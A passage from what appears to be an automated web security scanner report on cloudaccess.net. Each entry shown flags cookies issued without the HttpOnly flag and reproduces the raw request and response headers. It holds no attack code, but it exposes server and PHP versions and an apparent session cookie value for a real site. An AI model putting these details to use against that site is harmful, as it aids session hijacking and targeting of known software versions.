  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /copyright-policy.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:48 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Last-Modified: Wed, 30 Jun 2010 18:23:53 GMT
Expires: Mon, 24 Jan 2011 14:07:48 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.700. http://www.cloudaccess.net/flipphoto-pro.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /flipphoto-pro.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /flipphoto-pro.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:47 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Last-Modified: Thu, 09 Dec 2010 05:19:43 GMT
Expires: Mon, 24 Jan 2011 14:07:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.701. http://www.cloudaccess.net/forum.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /forum.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forum.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:47 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:48 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 13:52:48 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.702. http://www.cloudaccess.net/investor-relations.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /investor-relations.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:54 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /investor-relations.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:55 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Last-Modified: Fri, 27 Aug 2010 04:46:33 GMT
Expires: Mon, 24 Jan 2011 14:07:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.703. http://www.cloudaccess.net/joomla-developer-tools.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /joomla-developer-tools.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla-developer-tools.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 19:42:54 GMT
Expires: Mon, 24 Jan 2011 14:07:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.704. http://www.cloudaccess.net/joomla-features-tour.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /joomla-features-tour.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla-features-tour.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Last-Modified: Wed, 08 Sep 2010 20:18:30 GMT
Expires: Mon, 24 Jan 2011 14:07:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.705. http://www.cloudaccess.net/joomla-service-and-support.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /joomla-service-and-support.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla-service-and-support.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
Last-Modified: Wed, 29 Sep 2010 20:53:43 GMT
Expires: Mon, 24 Jan 2011 14:07:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...

14.706. http://www.cloudaccess.net/joomla-support-and-hosting-support.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /joomla-support-and-hosting-support.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:45 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
  • gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:46 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /joomla-support-and-hosting-support.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
